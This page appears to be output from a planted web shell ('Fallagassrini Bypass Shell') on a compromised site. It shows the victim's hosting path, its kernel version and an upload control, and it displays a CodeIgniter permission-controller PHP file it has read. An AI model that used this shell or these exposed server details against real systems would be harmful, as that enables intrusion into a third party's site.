? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sec/application/core/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sec/application/core/MY_Controller.php

<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');?>
<?php
class MY_Controller extends CI_Controller
{
    function MY_Controller()
    {
        parent::__construct();
        $this->load->model('mastermodel');
        if (!session_id())
        {
            session_start();
        }
        if (!isset($_SESSION['loggedin']))
        {
            redirect('sessions/login');
        }

        if (isset($_SESSION['user_id']))
        {
            if (!empty($_SESSION['current_menu']) && isset($_SESSION['current_menu']))
            {
                $user_id = $_SESSION['user_id'];
                $module = $_SESSION['current_module'];
                $menu = $_SESSION['current_mode'];

                $array_mod = explode(',', $_SESSION['user_modules']);
                $this->checkUrlPermission($menu, $array_mod);
            }
        }
    }

    function checkUrlPermission($menu, $array_mod)
    { 
        $array_perm = explode(',', $_SESSION['modules_permission']);
        $index = array_search($menu, $array_mod);
        $ar = str_split(sprintf('%04u', decbin($array_perm[$index])));
               
        if ($ar[0] == 1)
        {
            $this->crudPermission($menu, $array_mod, $array_perm);
            $_SESSION['Previous_URL'] = $_SERVER['REQUEST_URI'];
        }
        else
        {
           if(!empty($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) == 'xmlhttprequest')
           {                
                $data['msg'] = "Permission Denied";
                $json_data = $this->load->view('message', array('msg' => 'Permission Denied'), TRUE);
                echo json_encode(array('json_data' => $json_data, 'json_perm' => 0));
                die();
            } 
            else { 
               header("Location: " . site_url());
            }
        }
    }

    function crudPermission($menu, $array_mod, $array_perm)
    {
        $found = array_search($menu, $array_mod);
        $val = 0;
        if (isset($array_perm[$found]))
            $val = $array_perm[$found];
        $a = decbin($val);
        $d = sprintf('%03u', $a);
        $ar = str_split($d);

        if (isset($_POST['action']))
        {
            $check=0;
            if ($_POST['action'] == 'edit')
            {
                $check = 2;
            }
            if ($_POST['action'] == 'add')
            {
                $check = 1;
            }
            

            if ($ar[$check] != 1)
            {
                $json_data = $this->load->view('message', array('msg' => 'Permission Denied'), TRUE);
                echo json_encode(array('json_data' => $json_data, 'json_perm' => 0));
                die();
            }
        }
    }   
}
?>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net